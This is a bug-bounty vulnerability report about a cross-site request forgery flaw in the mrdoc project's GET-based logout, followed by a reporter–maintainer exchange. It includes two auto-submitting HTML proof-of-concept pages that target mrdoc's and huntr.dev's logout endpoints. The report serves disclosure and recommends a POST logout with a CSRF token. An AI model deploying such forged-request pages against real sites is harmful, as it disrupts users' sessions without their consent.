Cross-Site Request Forgery (CSRF) in zmister2016/mrdoc
Reported on
Nov 23rd 2021
Description
An attacker is able to log out a user if a logged-in user visits the attacker's website.
Proof of Concept
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://mrdoc.zmister.com/logout/">
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
Impact
This vulnerability is capable of forging users to unintentional logout.
More details
One way GET could be abused here is that a person (competitor perhaps:) placed an image tag with src="<your logout link>" anywhere on the internet, and if a user of your site stumbles upon that page, he will be unknowingly logged out. This is why it should be a POST with a CSRF token.
Note
While this cannot harm a user's account, it can be a great annoyance and is a valid CSRF.
Although after clicking on the PoC.html, the server HTTP response code is 500 with a message: Server Error (500). However, when reloading the homepage, you can see that the user has logout successfully.
According to the test, huntr.dev also has this problem.example:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://huntr.dev/auth/logout/">
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
So ……
Yes, I agree with you.
As noted in the description. "While this cannot harm a user's account it can be a great annoyance and is a valid CSRF."
As looking in some other reports on the same vulnerability, this is a simple fix. Either way, no disrespect if you disagree but it is valid. You will see that laravel itself now uses a POST request for logout and not GET.
Thanks for your response. It does not matter. It is up to you to decide whether to validate the report or not. I won't be upset. 🤗
But it's better to change it to post request.Thank you for your feedback.